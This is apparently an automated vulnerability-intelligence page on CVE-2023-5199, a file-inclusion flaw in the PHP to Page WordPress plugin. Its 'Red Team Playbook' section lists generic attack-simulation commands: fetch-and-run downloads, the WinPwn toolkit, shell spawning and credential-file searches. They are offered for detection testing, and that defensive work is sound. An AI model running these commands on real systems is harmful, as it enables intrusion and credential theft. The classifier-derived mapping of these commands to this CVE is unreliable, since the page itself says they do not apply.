CVE-2023-5199
Overview
This vulnerability is a Local File Inclusion (LFI) flaw in the 'php-to-page' shortcode of the bloafer PHP to Page WordPress plugin up to version 0.3. The root cause lies in insufficient validation and sanitization of user-supplied input within the shortcode handler, allowing inclusion of arbitrary local files. The affected component is the shortcode processing mechanism that interprets the 'php-to-page' shortcode parameter without proper access controls or input restrictions.
Vulnerability Description
The PHP to Page plugin for WordPress is vulnerable Local File Inclusion to Remote Code Execution in versions up to, and including, 0.3 via the 'php-to-page' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to include local file and potentially execute code on the server. While subscribers may need to poison log files or otherwise get a file installed in order to achieve remote code execution, author and above users can upload files by default and achieve remote code execution easily.
Impact
An attacker with subscriber-level or higher WordPress credentials can exploit this vulnerability to execute arbitrary PHP code on the server, leading to full system compromise. Subscribers require additional steps such as log poisoning to achieve RCE, whereas authors and above can upload files directly, simplifying exploitation. This can result in data breaches, website defacement, or persistent backdoors. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) indicates network exploitability with low complexity and privileges required, no user interaction, and complete impact on confidentiality, integrity, and availability.
Solution
Users of the bloafer PHP to Page WordPress plugin should upgrade to a version later than 0.3 where this vulnerability is addressed. The Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/83e5a0dc-fc51-4565-945f-190cf9175874) provides detailed patch information and recommendations. Administrators should apply the updated plugin version from the official WordPress plugin repository or the plugin's source code repository to mitigate this issue. No specific workaround is documented; timely patching is essential.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the PHP to Page plugin for WordPress is characterized by its susceptibility to Local File Inclusion (LFI), which can lead to Remote Code Execution (RCE). This flaw exists in versions up to and including 0.3, where the 'php-to-page' shortcode can be manipulated by authenticated users with subscriber-level permissions or higher. The crux of the issue lies in the plugin's failure to properly sanitize user input, allowing attackers to include arbitrary local files. This could potentially enable them to execute malicious scripts on the server, thereby compromising the integrity and confidentiality of the web application.
Attack vectors for this vulnerability are particularly concerning due to the low barrier to entry for potential attackers. Authenticated users, including those with minimal privileges, can exploit the LFI flaw by crafting specific requests that leverage the shortcode functionality. For instance, a subscriber could attempt to include sensitive files such as configuration files or log files that may contain sensitive information. Moreover, users with author permissions can upload files directly, providing an easier pathway to execute arbitrary code. Once a malicious file is included, the attacker can gain full control over the server, leading to a complete compromise of the WordPress installation.
The real-world impact of this vulnerability is significant, particularly for organizations relying on WordPress for their web presence. The ability for an attacker to execute code remotely can lead to data breaches, unauthorized access to sensitive information, and the potential for widespread defacement of websites. Furthermore, the repercussions extend beyond immediate technical damage; organizations may face reputational harm, loss of customer trust, and potential legal liabilities stemming from data protection regulations. The high CVSS score of 8.8 underscores the critical nature of this vulnerability, indicating that it poses a serious threat to affected systems.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating the PHP to Page plugin to the latest version is crucial, as updates often include patches for known vulnerabilities. Additionally, employing a Web Application Firewall (WAF) can help filter out malicious requests that attempt to exploit the LFI flaw. Monitoring server logs for unusual access patterns or attempts to include local files can also aid in early detection of exploitation attempts. Furthermore, restricting file upload permissions and ensuring that only trusted users have access to potentially dangerous functionalities can significantly reduce the attack surface.
In conclusion, the vulnerability within the PHP to Page plugin for WordPress presents a serious risk to web applications utilizing this plugin. The combination of LFI and RCE capabilities allows for a range of exploitation scenarios that can lead to severe consequences for organizations. By understanding the technical details, potential attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the risks associated with this vulnerability. As the threat landscape continues to evolve, proactive measures and vigilance are essential in safeguarding web applications from exploitation.
The CVSS score for CVE-2023-5199 has been revised upward from 8.8 to 9.9, reflecting a reassessment of the vulnerability’s criticality based on its exploitation potential and impact. This adjustment underscores the heightened risk posed by the PHP to Page WordPress plugin vulnerability, particularly given that authenticated users with minimal privileges can leverage local file inclusion to achieve remote code execution. CSURFACE threat intelligence indicates that while the exploitability remains stable without a surge in active exploitation attempts, the elevated severity score signals increased confidence in the vulnerability’s capability to facilitate impactful attacks if weaponized. This recalibration should prompt defenders to prioritize detection and response efforts accordingly, as the vulnerability now aligns with the highest severity tier, indicating a critical threat to affected web environments. Although no new exploit techniques or widespread exploitation campaigns have been detected by our telemetry, the stable EPSS score near the 90th percentile suggests persistent exploitation potential that warrants sustained vigilance.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Php To Page Project | Php To Page | All |
cpe:2.3:a:php_to_page_project:php_to_page:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-150 | Collect Data from Common Resource Locations |
32%
|
— | Medium | |
| CAPEC-639 | Probe System Files |
30%
|
— | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-5199 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/83e5a0dc-fc51-4565-945f-190cf9175874?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/php-to-page/trunk/php-to-page.php?rev=441028#L22 |